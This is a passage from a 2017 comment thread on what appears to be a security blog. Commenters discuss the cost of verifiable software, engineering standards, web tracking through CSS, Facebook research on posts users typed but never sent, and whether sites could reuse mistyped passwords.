A language that removes the possibility of certain bugs (I’m think of how golang prevents common C language errors) is also worth using but still leaves open possible errors. Yes, it is possible to write verifiable programs, but I think the extreme cost of doing that with current technology needs to be justified by a critical need or otherwise I’d rather spend all that extra time writing more useful, if potentially subtly flawed, functionality.

@Clive I think I personally would rather program than attend those standards meetings! Many systems development methodologies have been put forward as obvious requirements for good system design, only to yield failed projects or bad software anyhow, and be replaced by the next dogma. I once had the responsibility of developing standards for a large project and I look back in shame at my foisting of a half baked programming religion on those poor souls, however much they seemed to enjoy it! Quoting Bob Dylan: “I was so much older then, I’m younger than that now.”

tyr June 30, 2017 11:58 PM

@Georgina

It probably happened during the great leap
forward of archive.org interface. This was
bitterly fought over and resisted by the
most active users bt it was jammed somewhere
over the objections of the consensus. A
perfect example of what happens when the
programming in crowd thinks they know best
on any subject. Sometimes you can use the
standards to hold their feet to the fire
after an egregious screw-up but usually it
is a waste of time to complain to an ‘expert’.

The word Engineer has far too many divergent
groups claiming it and far too many sets of
qualifications to make it dependable. Most
of the drop-outs in math and science wind
up in civil engineering and they in turn
build the random VR you are forced to live
in by default.

xinxingren July 1, 2017 4:21 PM

While javascript is guilty of the auto-complete “feature”, there is a heap of other obnoxiousness now available via CSS, like mouse-over pop-ups, and once it’s been served to you, they know you’ve “seen” it. If you’re on the internet “they” know you’re there. Like in NYPD: “Be careful out there.”

mostly harmful July 2, 2017 3:28 AM

Magazine article from 2013: 71% of Facebook Users Engage in ‘Self-Censorship’
https://www.theatlantic.com/technology/archive/2013/04/71-of-facebook-users-engage-in-self-censorship/274982/

Excerpt:

Most Americans now know the feeling of typing something into a social media input box, thinking again, and deciding against posting whatever it was. But while it certainly seemed like a widespread phenomenon, no one had actually quantified the extent of this “self-censorship.”

But now, new research based on a sample of 3.9 million Facebook users reveals precisely how widespread this activity is. Carnegie Mellon PhD student Sauvik Das and Facebook’s Adam Kramer measured how many people typed more than five characters into Facebook content-input boxes, but then did not post them. They term this “last-minute self-censorship.” The research was posted to Das’ website and will presented at the Association for the Advancement of Artificial Intelligence’s conference on Weblogs and Social Media in July [NB: in 2013].

The numbers are impressively large. Fully one-third of all Facebook posts were self-censored, according to the method Das and Kramer devised, though they warn they probably captured a substantial number of false positives. 71 percent of all the users surveyed engaged in some self-censorship either on new posts or in comments, and the median self-censorer did so multiple times.

The magazine article’s links to the research are, of course, broken.

But a current download page for the research paper is here: https://research.fb.com/publications/self-censorship-on-facebook/
Current link to pdf: https://research.fb.com/wp-content/uploads/2016/11/self-censorship-on-facebook.pdf

LateToTheParty July 6, 2017 1:53 PM

Something I’ve always wondered….

I go to a site and enter my registered email and password. Login fails because I entered my email password, not the password to the site. I enter the correct password, login, and go about my business.

Did the site capture the incorrect password so that it could then be tested against my email provider?

Late to the Party July 6, 2017 1:57 PM

Something I’ve always wondered….

I go to a site and enter my registered email and password, but the login fails because I typed my email password instead of my password for the site. I correct my mistake and go about my business.

What stops the site from testing the incorrect password entered against my email account? (I do use 2FA, but still I wonder.)

latertotheparty July 6, 2017 2:15 PM

LateToTheParty
+1
although I have thought about that sort of thing, too, I am glad you wrote about it and others sniffing the network

Leave a comment

Login

Allowed HTML <a href="URL"> • <em> <cite> <i> • <strong> <b> • <sub> <sup> • <ul> <ol> <li> • <blockquote> <pre> Markdown Extra syntax via https://michelf.ca/projects/php-markdown/extra/

Sidebar photo of Bruce Schneier by Joe MacInnis.